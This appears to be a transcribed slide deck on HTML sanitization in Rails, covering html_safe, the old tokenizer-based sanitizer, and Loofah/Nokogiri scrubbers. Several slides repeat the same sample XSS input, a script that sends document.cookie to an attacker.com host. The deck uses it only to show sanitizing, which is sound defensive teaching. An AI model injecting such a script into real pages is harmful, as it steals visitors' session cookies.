Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Rails: The hidden parts

Rails: The hidden parts

Rafael França

April 26, 2014
Tweet

More Decks by Rafael França

Other Decks in Technology

Transcript

  1. string = "my string" # => "my string” ! string.html_safe?

    # => false ! safe_string = string.html_safe # => "my string” ! safe_string.html_safe? # => true HTML safety check
  2. string = "my string" # => "my string” ! string.html_safe?

    # => false ! safe_string = string.html_safe # => "my string” ! safe_string.html_safe? # => true HTML safety check
  3. string = "my string" # => "my string” ! string.html_safe?

    # => false ! safe_string = string.html_safe # => "my string” ! safe_string.html_safe? # => true HTML safety check
  4. my_html_string = "<b>HTML</b>" # => “<b>HTML</b>" ! ERB::Util.html_escape my_html_string #

    => “&lt;b&gt;HTML&lt;/b&gt;" ! ERB::Util.html_escape my_html_string.html_safe # => "<b>HTML</b>" rendering safe strings
  5. my_html_string = "<b>HTML</b>" # => “<b>HTML</b>" ! ERB::Util.html_escape my_html_string #

    => “&lt;b&gt;HTML&lt;/b&gt;" ! ERB::Util.html_escape my_html_string.html_safe # => "<b>HTML</b>" rendering safe strings
  6. my_html_string = "<b>HTML</b>" # => “<b>HTML</b>" ! ERB::Util.html_escape my_html_string #

    => “&lt;b&gt;HTML&lt;/b&gt;" ! ERB::Util.html_escape my_html_string.html_safe # => "<b>HTML</b>" rendering safe strings
  7. helper.sanitize(%{ Hello loser! <script> document.write( '<img src="http://www.attacker.com/' + document.cookie +

    '">' ); </script> }) # Hello loser! # <img src=\"http://www.attacker.com/&#39; + # document.cookie + # &#39;\">' # );
  8. tokenizer = HTML::Tokenizer.new(bad_string) tokenizer.next # => "Hello loser!\n” ! tokenizer.next

    # => “<script>" ! tokenizer.next # => "\n document.write(\n ‘" ! tokenizer.next # => "<img src=\"http://www.attacker.com/' +\n document.cookie +\n ‘\">" ! tokenizer.next # => "'\n );\n” ! tokenizer.next # => “</script>" ! tokenizer.next # => “\n" ! tokenizer.next # => nil
  9. tokenizer = HTML::Tokenizer.new(bad_string) tokenizer.next # => "Hello loser!\n” ! tokenizer.next

    # => “<script>" ! tokenizer.next # => "\n document.write(\n ‘" ! tokenizer.next # => "<img src=\"http://www.attacker.com/' +\n document.cookie +\n ‘\">" ! tokenizer.next # => "'\n );\n” ! tokenizer.next # => “</script>" ! tokenizer.next # => “\n" ! tokenizer.next # => nil
  10. tokenizer = HTML::Tokenizer.new(bad_string) tokenizer.next # => "Hello loser!\n” ! tokenizer.next

    # => “<script>" ! tokenizer.next # => "\n document.write(\n ‘" ! tokenizer.next # => "<img src=\"http://www.attacker.com/' +\n document.cookie +\n ‘\">" ! tokenizer.next # => "'\n );\n” ! tokenizer.next # => “</script>" ! tokenizer.next # => “\n" ! tokenizer.next # => nil
  11. tokenizer = HTML::Tokenizer.new(bad_string) tokenizer.next # => "Hello loser!\n” ! tokenizer.next

    # => “<script>" ! tokenizer.next # => "\n document.write(\n ‘" ! tokenizer.next # => "<img src=\"http://www.attacker.com/' +\n document.cookie +\n ‘\">" ! tokenizer.next # => "'\n );\n” ! tokenizer.next # => “</script>" ! tokenizer.next # => “\n" ! tokenizer.next # => nil
  12. tokenizer = HTML::Tokenizer.new(bad_string) tokenizer.next # => "Hello loser!\n” ! tokenizer.next

    # => “<script>" ! tokenizer.next # => "\n document.write(\n ‘" ! tokenizer.next # => "<img src=\"http://www.attacker.com/' +\n document.cookie +\n ‘\">" ! tokenizer.next # => "'\n );\n” ! tokenizer.next # => “</script>" ! tokenizer.next # => “\n" ! tokenizer.next # => nil
  13. tokenizer = HTML::Tokenizer.new(bad_string) tokenizer.next # => "Hello loser!\n” ! tokenizer.next

    # => “<script>" ! tokenizer.next # => "\n document.write(\n ‘" ! tokenizer.next # => "<img src=\"http://www.attacker.com/' +\n document.cookie +\n ‘\">" ! tokenizer.next # => "'\n );\n” ! tokenizer.next # => “</script>" ! tokenizer.next # => “\n" ! tokenizer.next # => nil
  14. tokenizer = HTML::Tokenizer.new(bad_string) tokenizer.next # => "Hello loser!\n” ! tokenizer.next

    # => “<script>" ! tokenizer.next # => "\n document.write(\n ‘" ! tokenizer.next # => "<img src=\"http://www.attacker.com/' +\n document.cookie +\n ‘\">" ! tokenizer.next # => "'\n );\n” ! tokenizer.next # => “</script>" ! tokenizer.next # => “\n" ! tokenizer.next # => nil
  15. tokenizer = HTML::Tokenizer.new(bad_string) tokenizer.next # => "Hello loser!\n” ! tokenizer.next

    # => “<script>" ! tokenizer.next # => "\n document.write(\n ‘" ! tokenizer.next # => "<img src=\"http://www.attacker.com/' +\n document.cookie +\n ‘\">" ! tokenizer.next # => "'\n );\n” ! tokenizer.next # => “</script>" ! tokenizer.next # => “\n" ! tokenizer.next # => nil
  16. tokenizer = HTML::Tokenizer.new(bad_string) tokenizer.next # => "Hello loser!\n” ! tokenizer.next

    # => “<script>" ! tokenizer.next # => "\n document.write(\n ‘" ! tokenizer.next # => "<img src=\"http://www.attacker.com/' +\n document.cookie +\n ‘\">" ! tokenizer.next # => "'\n );\n” ! tokenizer.next # => “</script>" ! tokenizer.next # => “\n" ! tokenizer.next # => nil
  17. def tokenize(text) tokenizer = HTML::Tokenizer.new(text) result = [] ! while

    token = tokenizer.next node = HTML::Node.parse(nil, 0, 0, token, false) result << node end ! result end
  18. def tokenize(text) tokenizer = HTML::Tokenizer.new(text) result = [] ! while

    token = tokenizer.next node = HTML::Node.parse(nil, 0, 0, token, false) result << node end ! result end
  19. def tokenize(text) tokenizer = HTML::Tokenizer.new(text) result = [] ! while

    token = tokenizer.next node = HTML::Node.parse(nil, 0, 0, token, false) result << node end ! result end
  20. def tokenize(text) tokenizer = HTML::Tokenizer.new(text) result = [] ! while

    token = tokenizer.next node = HTML::Node.parse(nil, 0, 0, token, false) result << node end ! result end
  21. Nodes nodes = tokenize(bad_string) # => [#<HTML::Text:..., …] ! nodes.map

    { |node| node.class } # => [HTML::Text, HTML::Tag, HTML::Text, # HTML::Tag, HTML::Text, HTML::Tag, HTML::Text]
  22. # [HTML::Text - "Hello loser!\n”] ! # [HTML::Tag - “<script>"]

    ! # [HTML::Text - "\n document.write(\n “] ! # [HTML::Tag - "<img src=\"http://www.attacker.com/' + \n document.cookie +\n ‘\">"] ! # [HTML::Text - "'\n );\n”] ! # [HTML::Tag - “</script>"] ! # [HTML::Text - "\n"] Tokens
  23. # [HTML::Text - "Hello loser!\n”] ! # [HTML::Tag - “<script>"]

    ! # [HTML::Text - "\n document.write(\n “] ! # [HTML::Tag - "<img src=\"http://www.attacker.com/' + \n document.cookie +\n ‘\">"] ! # [HTML::Text - "'\n );\n”] ! # [HTML::Tag - “</script>"] ! # [HTML::Text - "\n"] Tokens
  24. # [HTML::Text - "Hello loser!\n”] ! # [HTML::Tag - “<script>"]

    ! # [HTML::Text - "\n document.write(\n “] ! # [HTML::Tag - "<img src=\"http://www.attacker.com/' + \n document.cookie +\n ‘\">"] ! # [HTML::Text - "'\n );\n”] ! # [HTML::Tag - “</script>"] ! # [HTML::Text - "\n"] Tokens
  25. # [HTML::Text - "Hello loser!\n”] ! # [HTML::Tag - “<script>"]

    ! # [HTML::Text - "\n document.write(\n “] ! # [HTML::Tag - "<img src=\"http://www.attacker.com/' + \n document.cookie +\n ‘\">"] ! # [HTML::Text - "'\n );\n”] ! # [HTML::Tag - “</script>"] ! # [HTML::Text - "\n"] Tokens
  26. # [HTML::Text - "Hello loser!\n”] ! # [HTML::Tag - “<script>"]

    ! # [HTML::Text - "\n document.write(\n “] ! # [HTML::Tag - "<img src=\"http://www.attacker.com/' + \n document.cookie +\n ‘\">"] ! # [HTML::Text - "'\n );\n”] ! # [HTML::Tag - “</script>"] ! # [HTML::Text - "\n"] Tokens
  27. # [HTML::Text - "Hello loser!\n”] ! # [HTML::Tag - “<script>"]

    ! # [HTML::Text - "\n document.write(\n “] ! # [HTML::Tag - "<img src=\"http://www.attacker.com/' + \n document.cookie +\n ‘\">"] ! # [HTML::Text - "'\n );\n”] ! # [HTML::Tag - “</script>"] ! # [HTML::Text - "\n"] Tokens
  28. # [HTML::Text - "Hello loser!\n”] ! # [HTML::Tag - “<script>"]

    ! # [HTML::Text - "\n document.write(\n “] ! # [HTML::Tag - "<img src=\"http://www.attacker.com/' + \n document.cookie +\n ‘\">"] ! # [HTML::Text - "'\n );\n”] ! # [HTML::Tag - “</script>"] ! # [HTML::Text - "\n"] Tokens
  29. # [HTML::Text - "Hello loser!\n”] ! # [HTML::Tag - “<script>"]

    ! # [HTML::Text - "\n document.write(\n “] ! # [HTML::Tag - "<img src=\"http://www.attacker.com/' + \n document.cookie +\n ‘\">"] ! # [HTML::Text - "'\n );\n”] ! # [HTML::Tag - “</script>"] ! # [HTML::Text - "\n"] Tokens
  30. # [HTML::Text - "Hello loser!\n”] ! # [HTML::Tag - “<script>"]

    ! # [HTML::Text - "\n document.write(\n “] ! # [HTML::Tag - "<img src=\"http://www.attacker.com/' + \n document.cookie +\n ‘\">"] ! # [HTML::Text - "'\n );\n”] ! # [HTML::Tag - “</script>"] ! # [HTML::Text - "\n"] Tokens
  31. def tokenize(text) tokenizer = HTML::Tokenizer.new(text) result= [] while token =

    tokenizer.next node = HTML::Node.parse(nil, 0, 0, token, false) process_node(node, result) end result end ! def process_node(node, result) result << node.to_s end
  32. def tokenize(text) tokenizer = HTML::Tokenizer.new(text) result= [] while token =

    tokenizer.next node = HTML::Node.parse(nil, 0, 0, token, false) process_node(node, result) end result end ! def process_node(node, result) result << node.to_s end
  33. Problems • code is hard to maintain • use regular

    expressions to tokenize the string • very error prone • changing this code can open security holes
  34. doc = Nokogiri::HTML::DocumentFragment.parse(bad_string) ! doc.children.each { |n| p n }

    # => #<Nokogiri::XML::Text:0x3fc7f149acac "Hello loser!\n"> # => #<Nokogiri::XML::Element:0x3fc7f149ac48 name="script" children=[ # => #<Nokogiri::XML::CDATA:0x3fc7f149a658 "\n document.write(\n... # => ]>
  35. doc = Nokogiri::HTML::DocumentFragment.parse(bad_string) ! doc.children.each { |n| p n }

    # => #<Nokogiri::XML::Text:0x3fc7f149acac "Hello loser!\n"> # => #<Nokogiri::XML::Element:0x3fc7f149ac48 name="script" children=[ # => #<Nokogiri::XML::CDATA:0x3fc7f149a658 "\n document.write(\n... # => ]>
  36. doc = Nokogiri::HTML::DocumentFragment.parse(bad_string) ! doc.children.each { |n| p n }

    # => #<Nokogiri::XML::Text:0x3fc7f149acac "Hello loser!\n"> # => #<Nokogiri::XML::Element:0x3fc7f149ac48 name="script" children=[ # => #<Nokogiri::XML::CDATA:0x3fc7f149a658 "\n document.write(\n... # => ]>
  37. doc = Loofah.fragment(bad_string) ! remove_script = Loofah::Scrubber.new do |node| node.remove

    if node.name == "script" end ! doc.scrub!(remove_script) ! doc.to_text # => "Hello loser!\n"
  38. doc = Loofah.fragment(bad_string) ! remove_script = Loofah::Scrubber.new do |node| node.remove

    if node.name == "script" end ! doc.scrub!(remove_script) ! doc.to_text # => "Hello loser!\n"
  39. doc = Loofah.fragment(bad_string) ! remove_script = Loofah::Scrubber.new do |node| node.remove

    if node.name == "script" end ! doc.scrub!(remove_script) ! doc.to_text # => "Hello loser!\n"
  40. doc = Loofah.fragment(bad_string) ! remove_script = Loofah::Scrubber.new do |node| node.remove

    if node.name == "script" end ! doc.scrub!(remove_script) ! doc.to_text # => "Hello loser!\n"
  41. FullSanitizer full_sanitizer = Rails::Html::FullSanitizer.new ! full_sanitizer.sanitize( "<b>Bold</b> no more! <a

    href='more.html'>See more here</a>…" ) # => Bold no more! See more here...
  42. FullSanitizer full_sanitizer = Rails::Html::FullSanitizer.new ! full_sanitizer.sanitize( "<b>Bold</b> no more! <a

    href='more.html'>See more here</a>…" ) # => Bold no more! See more here...
  43. FullSanitizer full_sanitizer = Rails::Html::FullSanitizer.new ! full_sanitizer.sanitize( "<b>Bold</b> no more! <a

    href='more.html'>See more here</a>…" ) # => Bold no more! See more here...
  44. WhiteListSanitizer white_list_sanitizer = Rails::Html::WhiteListSanitizer.new ! white_list_sanitizer.sanitize(bad_string) # => "Hello loser!\n"

    ! good_string = "<b>Bold</b> no more! <a href='more.html'>See more here</a>..." ! white_list_sanitizer.sanitize(good_string) # => "<b>Bold</b> no more! <a href=\"more.html\">See more here</a>..." ! white_list_sanitizer.sanitize(good_string, tags: %w(b)) => "<b>Bold</b> no more! See more here..." ! white_list_sanitizer.sanitize(@article.body, scrubber: ArticleScrubber.new)
  45. WhiteListSanitizer white_list_sanitizer = Rails::Html::WhiteListSanitizer.new ! white_list_sanitizer.sanitize(bad_string) # => "Hello loser!\n"

    ! good_string = "<b>Bold</b> no more! <a href='more.html'>See more here</a>..." ! white_list_sanitizer.sanitize(good_string) # => "<b>Bold</b> no more! <a href=\"more.html\">See more here</a>..." ! white_list_sanitizer.sanitize(good_string, tags: %w(b)) => "<b>Bold</b> no more! See more here..." ! white_list_sanitizer.sanitize(@article.body, scrubber: ArticleScrubber.new)
  46. WhiteListSanitizer white_list_sanitizer = Rails::Html::WhiteListSanitizer.new ! white_list_sanitizer.sanitize(bad_string) # => "Hello loser!\n"

    ! good_string = "<b>Bold</b> no more! <a href='more.html'>See more here</a>..." ! white_list_sanitizer.sanitize(good_string) # => "<b>Bold</b> no more! <a href=\"more.html\">See more here</a>..." ! white_list_sanitizer.sanitize(good_string, tags: %w(b)) => "<b>Bold</b> no more! See more here..." ! white_list_sanitizer.sanitize(@article.body, scrubber: ArticleScrubber.new)
  47. WhiteListSanitizer white_list_sanitizer = Rails::Html::WhiteListSanitizer.new ! white_list_sanitizer.sanitize(bad_string) # => "Hello loser!\n"

    ! good_string = "<b>Bold</b> no more! <a href='more.html'>See more here</a>..." ! white_list_sanitizer.sanitize(good_string) # => "<b>Bold</b> no more! <a href=\"more.html\">See more here</a>..." ! white_list_sanitizer.sanitize(good_string, tags: %w(b)) => "<b>Bold</b> no more! See more here..." ! white_list_sanitizer.sanitize(@article.body, scrubber: ArticleScrubber.new)
  48. WhiteListSanitizer white_list_sanitizer = Rails::Html::WhiteListSanitizer.new ! white_list_sanitizer.sanitize(bad_string) # => "Hello loser!\n"

    ! good_string = "<b>Bold</b> no more! <a href='more.html'>See more here</a>..." ! white_list_sanitizer.sanitize(good_string) # => "<b>Bold</b> no more! <a href=\"more.html\">See more here</a>..." ! white_list_sanitizer.sanitize(good_string, tags: %w(b)) => "<b>Bold</b> no more! See more here..." ! white_list_sanitizer.sanitize(@article.body, scrubber: ArticleScrubber.new)
  49. WhiteListSanitizer white_list_sanitizer = Rails::Html::WhiteListSanitizer.new ! white_list_sanitizer.sanitize(bad_string) # => "Hello loser!\n"

    ! good_string = "<b>Bold</b> no more! <a href='more.html'>See more here</a>..." ! white_list_sanitizer.sanitize(good_string) # => "<b>Bold</b> no more! <a href=\"more.html\">See more here</a>..." ! white_list_sanitizer.sanitize(good_string, tags: %w(b)) => "<b>Bold</b> no more! See more here..." ! white_list_sanitizer.sanitize(@article.body, scrubber: ArticleScrubber.new)
  50. Custom Sanitizer! class MySerializer < Rails::Html::Sanitizer def sanitize(html, options =

    {}) Loofah.scrub_fragment(html, MyCustomScrubber.new).to_s end end
  51. Scrubbers spam2div = Loofah::Scrubber.new do |node| node.name = "div" if

    node.name == "span" end ! class Span2Div < Loofah::Scrubber def scrub(node) node.name = "div" if node.name == "span" end end
  52. Scrubbers spam2div = Loofah::Scrubber.new do |node| node.name = "div" if

    node.name == "span" end ! class Span2Div < Loofah::Scrubber def scrub(node) node.name = "div" if node.name == "span" end end
  53. Scrubbers spam2div = Loofah::Scrubber.new do |node| node.name = "div" if

    node.name == "span" end ! class Span2Div < Loofah::Scrubber def scrub(node) node.name = "div" if node.name == "span" end end
  54. Scrubbers class ArticleScrubber < Loofah::Scrubber def scrub(node) if node.name ==

    "gallery" replacement = render(partial: 'gallery') node.replace Loofah.fragment(replacement) end end end
  55. Scrubbers class ArticleScrubber < Loofah::Scrubber def scrub(node) if node.name ==

    "gallery" replacement = render(partial: 'gallery') node.replace Loofah.fragment(replacement) end end end
  56. Scrubbers class ArticleScrubber < Loofah::Scrubber def scrub(node) if node.name ==

    "gallery" replacement = render(partial: 'gallery') node.replace Loofah.fragment(replacement) end end end
  57. Scrubbers class ArticleScrubber < Loofah::Scrubber def scrub(node) if node.name ==

    "gallery" replacement = render(partial: 'gallery') node.replace Loofah.fragment(replacement) end end end
  58. Problems • Some HTML 5 documents are invalid for Nokogiri

    • Nokogiri requires libxml, which may not work on Windows • Some applications may break when upgrading